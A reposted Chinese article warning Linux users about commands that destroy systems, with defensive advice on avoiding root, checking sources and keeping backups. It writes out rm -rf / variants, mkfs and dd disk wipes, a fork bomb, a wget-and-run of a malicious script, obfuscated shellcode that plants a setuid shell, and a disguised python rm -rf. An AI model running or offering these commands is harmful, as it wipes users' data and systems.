溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

千萬千萬不要運(yùn)行的 Linux 命令

發(fā)布時(shí)間:2020-07-18 22:48:38 來源:網(wǎng)絡(luò) 閱讀:154 作者:wx5c4682be18b52 欄目:系統(tǒng)運(yùn)維

文中列出的命令絕對(duì)不可以運(yùn)行,即使你覺得很好奇也不行,除非你是在虛擬機(jī)上運(yùn)行(出現(xiàn)問題你可以還原),因?yàn)樗鼈儠?huì)實(shí)實(shí)在在的破壞你的系統(tǒng)。所以不在root等高級(jí)管理權(quán)限下執(zhí)行命令是很好的習(xí)慣。

 早晚有一天,Linux 系統(tǒng)會(huì)像 Windows 那樣流行,用的人越來越多,包括對(duì)計(jì)算機(jī)不是很了解的人,本文的目的就是告訴大家:在 Linux 給你最大程度自由度的同時(shí),也使得破壞系統(tǒng)變得更加容易,如果你不了解某些命令的意義,下載執(zhí)行包含惡意命令的腳本,或者被騙運(yùn)行某些命令,很容易讓你哭 都來不及。

  這并不是說明 Linux 不安全,只是說明在不了解 Linux ,和很不小心的人面前,Linux 十分不安全。Windows 也好,Linux 也好,人本身才是最大的不安全因素。

  下面的命令會(huì)刪除你硬盤上的文件,rm 的 -r 遞歸刪除,和 -f 強(qiáng)制刪除是很危險(xiǎn)的選項(xiàng),即使日常操作,也會(huì)遇到誤刪文件的情況。

sudo rm -rf /   ##刪除根分區(qū)全部的文件
sudo rm -rf .   ##刪除當(dāng)前目錄下的所有文件
sudo rm -rf *   ##同上
rm -rf * or rm -rf *.*  ##同上
rm -rf ~ / &    ##刪除根分區(qū)和家目錄,即使你不是root,家目錄還是不能幸免。

同樣,如果你不知道 mkfs.xxxx (xxxx 可以是 vfat、ext2、ext3、bfs……) 是格式化命令的話,運(yùn)行下面的命令會(huì)擦除你的硬盤分區(qū):

sudo mkfs.xxxx

 dd 是強(qiáng)大的 IO 輸入輸出定向工具,如果使用不當(dāng),破壞性很大,不僅僅是當(dāng)前分區(qū),當(dāng)前系統(tǒng),有的時(shí)候是整個(gè)硬盤。

sudo dd if=/dev/zero of=/dev/sda    ##全部硬盤清零。
sudo dd if=/dev/sda of=/dev/sdb     ##用第一塊硬盤的內(nèi)容覆蓋第二塊的內(nèi)容。
sudo dd if=something of=/dev/sda    ##往硬盤上寫垃圾數(shù)據(jù)。

同理,直接把命令結(jié)果定向到硬盤上,相當(dāng)于往硬盤上寫垃圾數(shù)據(jù):

any_command > /dev/sda 用隨意的數(shù)據(jù)破壞硬盤

 上面的 sda 、sdb 也可能是其他類似的名稱。Linux 的 /dev 系統(tǒng)給操縱硬件提供了很方便和強(qiáng)大的功能,同時(shí)也使得破壞變得更容易。

  fork 命令打開一個(gè)子進(jìn)程,如果把 fork 放在無限循環(huán)中,最終子進(jìn)程會(huì)耗盡所有內(nèi)存資源:

:(){:|:&};:

 這段不知所云的符號(hào),可以讓 Shell 不停的 fork 子進(jìn)程,最后導(dǎo)致內(nèi)存耗盡,不得不重啟,這不是 bug,只是 Shell 語句故意寫成簡寫的形式而已。下面的同理:

fork while fork

 有的時(shí)候,壓縮包也是一個(gè)破壞來源~

  有的壓縮包要求你解壓到某個(gè)系統(tǒng)中已經(jīng)存在的目錄中,這時(shí)候你就要特別小心了,壓縮包里面可能有成千上萬的小文件,以各種文件名嘗試覆蓋你現(xiàn)有的文件。

  有的壓縮包看起來很小,但是解壓出來是上 GB 的垃圾數(shù)據(jù),會(huì)充斥你的硬盤。

  從不正規(guī)網(wǎng)站下載的程序、腳本,同樣會(huì)有包含惡意命令的危險(xiǎn),不可隨便執(zhí)行:

wget [url]http://some_place/some_file[/url]
sh ./some_file
wget [url]http://hax018r.org/malicious-script[/url]
sh ./malicious-script

 載腳本要確保來源正規(guī),如果有能力,可以閱讀其代碼。即使有源代碼的程序,也不要隨便編譯執(zhí)行:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

 上面看起來只是一堆沒有意義的 16 進(jìn)制數(shù)據(jù),如果有人告訴你,運(yùn)行這個(gè)程序你就可以不輸入密碼取得系統(tǒng)的 root 權(quán)限,你可不要相信他,上面的程序?qū)嶋H運(yùn)行的是“rm -rf ~ / & ”。

  python 一類的腳本語言,同樣可以拿來搞破壞:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg! "]))'

 這段程序?qū)嶋H上會(huì)執(zhí)行 rm -rf ,也許你很奇怪上面程序結(jié)尾的 “sn!.sg! ” 是什么意思,實(shí)際上就是 rm -rf 每個(gè)字母的下一個(gè)!

  那么我們?nèi)绾伪苊膺\(yùn)行惡意程序呢?

  第一不要用 root 作為日常使用的用戶,上面的程序,如果當(dāng)前用戶不是 root,危害的波及范圍就會(huì)小很多。

  第二要知道哪些命令是干什么用的,不知道的命令不要冒然運(yùn)行。運(yùn)行有潛在破壞能力的程序,要小心檢查自己的輸入。

  第三要保證軟件、腳本的來源正規(guī)。

  最后一點(diǎn),雖然比較消極,但是確實(shí)十分重要的一點(diǎn):

 經(jīng)常備份你的數(shù)據(jù)?。?/strong>
本文源自:https://linux.cn/article-401-1.html

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI